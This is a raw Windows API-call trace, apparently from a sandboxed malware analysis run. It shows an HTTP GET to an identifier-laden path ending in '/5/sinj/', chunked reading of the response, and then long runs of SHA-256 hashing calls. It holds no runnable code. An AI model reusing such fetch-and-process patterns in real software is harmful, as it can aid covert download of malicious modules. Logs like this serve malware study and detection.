	[0191.633] WinHttpOpenRequest (hConnect=0x227d8a0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/sinj/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0191.633] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x127b44, dwBufferLength=0x4) returned 1
	[0191.633] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0192.342] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0192.342] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x127b34, lpdwBufferLength=0x127b30, lpdwIndex=0x0 | out: lpBuffer=0x127b34*, lpdwBufferLength=0x127b30*=0x4, lpdwIndex=0x0) returned 1
	[0192.342] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0xea9) returned 1
	[0192.343] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xeb0) returned 0x26ccf10
	[0192.343] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26ccf10, dwNumberOfBytesToRead=0xea9, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26ccf10*, lpdwNumberOfBytesRead=0x127b30*=0xea9) returned 1
	[0192.343] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0192.343] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26ccf10, Size=0x2eb0) returned 0x2690048
	[0192.343] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x2690ef1, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x2690ef1*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0192.343] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x10b2) returned 1
	[0192.344] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0x3f60) returned 0x2690048
	[0192.344] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x2692ef1, dwNumberOfBytesToRead=0x10b2, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x2692ef1*, lpdwNumberOfBytesRead=0x127b30*=0x10b2) returned 1
	[0192.344] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0192.345] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0x5f60) returned 0x26a4060
	[0192.345] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26a7fbb, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26a7fbb*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0192.345] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0192.345] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26a4060, Size=0x7f60) returned 0x26a4060
	[0192.345] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26a9fbb, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26a9fbb*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0192.345] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0192.387] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26a4060, Size=0x9f60) returned 0x26a4060
	[0192.387] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26abfbb, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26abfbb*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0192.387] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0192.387] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26a4060, Size=0xbf60) returned 0x26a4060
	[0192.387] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26adfbb, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26adfbb*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0192.388] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0192.477] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26a4060, Size=0xdf60) returned 0x26a4060
	[0192.477] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26affbb, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26affbb*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0192.477] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0192.478] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26a4060, Size=0xff60) returned 0x26a4060
	[0192.478] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26b1fbb, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26b1fbb*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0192.478] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0192.479] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26a4060, Size=0x11f60) returned 0x26a4060
	[0192.479] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26b3fbb, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26b3fbb*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0192.479] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0192.479] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26a4060, Size=0x13f60) returned 0x2732590
	[0192.481] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x27444eb, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x27444eb*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0192.481] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0xe55) returned 1
	[0192.481] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x14db0) returned 0x2732590
	[0192.481] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x27464eb, dwNumberOfBytesToRead=0xe55, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x27464eb*, lpdwNumberOfBytesRead=0x127b30*=0xe55) returned 1
	[0192.482] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x0) returned 1
	[0192.482] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2301270) returned 1
	[0192.482] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2753bd8
	[0192.482] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.483] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.483] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0192.483] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.483] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301270
	[0192.483] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301270, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301270, pdwDataLen=0x1283b0) returned 1
	[0192.483] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.483] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.483] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.483] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.483] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0192.483] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.483] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301298
	[0192.484] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301298, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301298, pdwDataLen=0x1283b0) returned 1
	[0192.484] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.484] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.484] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.484] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.484] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0192.484] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.484] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23012c0
	[0192.484] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23012c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23012c0, pdwDataLen=0x1283b0) returned 1
	[0192.484] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.484] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.484] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.485] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.485] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0192.485] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.485] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23012e8
	[0192.485] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23012e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23012e8, pdwDataLen=0x1283b0) returned 1
	[0192.485] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.485] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.485] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.486] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.486] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0192.486] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.486] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301310
	[0192.486] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301310, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301310, pdwDataLen=0x1283b0) returned 1
	[0192.486] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.486] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.486] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.487] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.487] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0192.487] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.487] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301338
	[0192.487] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301338, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301338, pdwDataLen=0x1283b0) returned 1
	[0192.487] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.487] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.487] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.487] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.487] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0192.487] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.487] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301360
	[0192.487] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301360, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301360, pdwDataLen=0x1283b0) returned 1
	[0192.488] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.488] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.488] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.488] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.488] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0192.488] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.488] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301388
	[0192.488] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301388, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301388, pdwDataLen=0x1283b0) returned 1
	[0192.488] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.488] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.488] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.489] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.489] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0192.489] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.489] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23013b0
	[0192.489] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23013b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23013b0, pdwDataLen=0x1283b0) returned 1
	[0192.489] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.489] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.489] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.490] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.490] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0192.490] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.490] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23013d8
	[0192.490] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23013d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23013d8, pdwDataLen=0x1283b0) returned 1
	[0192.490] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.490] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.490] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.491] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.491] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0192.491] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.491] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301400
	[0192.491] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301400, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301400, pdwDataLen=0x1283b0) returned 1
	[0192.491] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.491] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.491] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.491] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.491] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0192.492] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.492] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301428
	[0192.492] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301428, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301428, pdwDataLen=0x1283b0) returned 1
	[0192.492] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.492] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.492] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.492] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.492] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0192.492] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.492] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301450
	[0192.492] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301450, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301450, pdwDataLen=0x1283b0) returned 1
	[0192.492] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.492] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.492] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.493] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.493] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0192.493] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.493] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301478
	[0192.493] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301478, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301478, pdwDataLen=0x1283b0) returned 1
	[0192.493] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.493] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.493] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.494] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.494] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0192.494] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.494] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23014a0
	[0192.494] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23014a0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23014a0, pdwDataLen=0x1283b0) returned 1
	[0192.494] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.494] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.494] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.495] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.495] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0192.495] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.495] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23014c8
	[0192.495] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23014c8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23014c8, pdwDataLen=0x1283b0) returned 1
	[0192.495] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.495] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.495] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.495] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.495] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0192.495] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.495] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23014f0
	[0192.495] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23014f0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23014f0, pdwDataLen=0x1283b0) returned 1
	[0192.495] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.496] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.496] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.496] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.496] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0192.496] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.496] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301518
	[0192.496] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301518, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301518, pdwDataLen=0x1283b0) returned 1
	[0192.496] CryptDestroyHash (hHash=0x22b6900) returned 1
